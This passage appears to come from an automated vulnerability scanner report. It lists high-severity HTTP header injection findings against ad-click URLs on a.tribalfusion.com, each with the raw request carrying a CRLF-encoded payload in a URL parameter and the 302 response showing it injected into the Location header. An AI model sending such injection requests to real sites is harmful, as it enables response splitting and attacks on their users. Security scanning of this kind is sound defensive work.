Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 83f7f%0d%0a20b0303aa8 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/83f7f%0d%0a20b0303aa8/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:00 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/83f7f
20b0303aa8
/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.18. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 9 is copied into the Location response header. The payload 90f5c%0d%0a969ec85c814 was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/90f5c%0d%0a969ec85c814/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:19 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/90f5c
969ec85c814
/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.19. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr request parameter is copied into the Location response header. The payload 2b368%0d%0ae152459b88d was submitted in the http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=2b368%0d%0ae152459b88d HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:57 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=2b368
e152459b88d

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.20. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b66f4%0d%0af5f710e997 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?b66f4%0d%0af5f710e997=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:59 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?b66f4
f5f710e997
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.21. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8d45c%0d%0a20e1c69dbef was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/?8d45c%0d%0a20e1c69dbef=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:13 GMT;
Content-Type: text/html
Location: ?8d45c
20e1c69dbef
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.22. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload ac0a8%0d%0a8ed1987295d was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=ac0a8%0d%0a8ed1987295d HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:11 GMT;
Content-Type: text/html
Location: ;ord=ac0a8
8ed1987295d

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.23. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2bc38%0d%0a32afce6163b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/?2bc38%0d%0a32afce6163b=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=arnhU0NZaiLAhj9Isqf9XkEtM2LcGeaAkKcb5As9NcGY9HeynZawANdxZdhEkpAEjSar40EPy8Qg6yOKnw9jcR1E1fIkivOacp4WKZcZdKt9mQvkuxiff0DpPvroLVNxh2P6939LByRZaPIkoqROZauoA37raL05RM0o93YqZaL60WYFw0HNpNmktZc3c0nexcuSZaKeY7RhGXJIkxTSUwwNWrjqiXi1aZcIZa7N2upllyR3GYJmbLjf7Tkusi56FZdepb7KYtau2FsbPCRXhp1ANh9nA4WKmLJ5eVvdgBZad2RZcR8kZcTVgsAGq7jAHMOp2I85YbeSsZcwhpjEdZbZcaFgyVxTZdZdp6ZbZdfxTw8SgQwBRqWEi562H49DiZbZd7os5ppMR1Xdtt8t7HXNGXJyKvK9KHjUIPk2k2IFVZbQZcWm4cZbQUCTqhRCOhvwj1d4KUtJ8cVZas7ClNgQnIhnLLOqpXUwwGGQuAgF7ag8VvOcU9mQk; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:17 GMT;
Content-Type: text/html
Location: ?2bc38
32afce6163b
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.24. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload d8e25%0d%0abe3ec6901dd was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=d8e25%0d%0abe3ec6901dd HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:06 GMT;
Content-Type: text/html
Location: ;ord=d8e25
be3ec6901dd

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.25. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ebaaf%0d%0a08b66f30576 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ebaaf%0d%0a08b66f30576/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aEnh31RZdybIhTCFC3l82sIZdmRHKrYfmPW94PHVpJpHFiyZapFphLCHWXL1UmUW5lC195ji5Zc5HZaA5pxsNZdlwpSAP2GhvKP0eSZdQcsGjpgNShKCmcPiqHMnxTGn7tJJsQhfabn2Gkb9tE1Vw4soOCeXn5ERcUoFuieqVixMKw83tBlQWAwW5X9pgSOix8uCf0VV51f4skKBuV4y0TCTyZctgjOXaOod9Cknoxl1hXYhcIepQcFSi97eDHZc2p1kLXjj490L5e6pelywx6qDYCFo9uXlyFkgBM4B8hKcg4XevxYgqvHZbbif3JJHwKVkD2tt9GkTeoHpHmceBFZao4I6yRM0ZcZdLLneXmB6yWeqQ2mBChJqjO1L72pVJyYwCciG1OqFwtnUAJpEqaeiK3qBrDQ4hDA1mbCJkZaMHZcNLDF4Za9nmhvLUobVJjeXnu72ZdONen2RuCd6njrl3V0qowXRSn5V0PEZdG02Zbj; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:33 GMT;
Content-Type: text/html
Location: ebaaf
08b66f30576
/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.26. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5b6fb%0d%0a147c7cf0d7 was submitted in REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

